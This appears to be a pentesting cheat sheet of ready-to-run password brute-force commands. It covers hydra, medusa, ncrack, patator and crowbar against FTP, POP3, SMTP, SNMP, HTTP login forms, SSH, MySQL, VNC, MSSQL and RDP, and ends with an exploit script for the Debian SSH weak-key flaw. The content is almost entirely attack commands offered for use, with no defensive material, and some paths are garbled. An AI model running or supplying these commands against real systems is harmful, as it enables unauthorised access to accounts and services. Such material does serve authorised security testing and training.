🥷 Brute-force attacks Cheat Sheet (FTP, POP3, SNMP, SSH, VNC, …)
Improve your pentesting skills with the following techniques.
Tool:Â hydra
Attack FTP:
hydra -l $USERNAME -P /usr/share/wordlistsnmap.lst -f $IP ftp -V
Attack POP3:
hydra -l $USERNAME -P /usr/share/wordlistsnmap.lst -f $IP pop3 -V
Attack SMTP:
hydra -P /usr/share/wordlistsnmap.lst $IP smtp -V
Attack SNMP:
hydra -P /usr/share/wordlists/snmp.txt -v $IP snmp
Attack HTTP form:
hydra -l root@localhost -I -P cewl.txt $IP http-post-form "/$SCRIPT_PATH:Action=Login&User=^USER^&Password=^PASS^:Login failed" -V
Attack SSH (OpenSSH):
hydra -l root -P /usr/share/wordlists/rockyou.txt $IP ssh
hydra -t 4 -L users.txt -P pass.txt -M targets.txt ssh
Attack MySQL:
hydra -l root -P /usr/share/wordlists/rockyou.txt $IP mysql
Attack VNC:
hydra -P /usr/share/wordlists/rockyou.txt $IP -t 1 vnc
Check credentials for MS SQL:
hydra -l sa -p PASSWORD mssql://$IP
Check credentials for MS SQL on different port:
hydra -l sa -p password mssql://$IP:27900
Tool: Medusa
Attack HTTP Basic authentication against phpmyadmin directory:
medusa -h $IP -u admin -P /usr/share/wordlists/megacorp.txt -m DIR:/phpmyadmin/ -t 10 -M http
Attack FTP:
medusa -u kevin -P /usr/share/wordlists/megacorp-last.txt -h $IP -M ftp -t 10
List available modules:
ls /usr/lib/medusa/modules/
Others
ncrack -vv --user Administrator -P /usr/share/wordlists/megacorp.txt rdp://$IP
patator ftp_login host=$IP user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:mesg=Login incorrect. -x ignore,reset,retry:code=500
./crowbar.py -b rdp -s $IP/24 -U /root/Desktop/userlist -C /root/Desktop/passlist -d
./crowbar.py -b sshkey -s $IP/24 -u root -k /root/.ssh/ -d
python CVE-2008-0166-Debian-ssh-PRNG.py TOOLS/rsa/2048 $IP root 22 6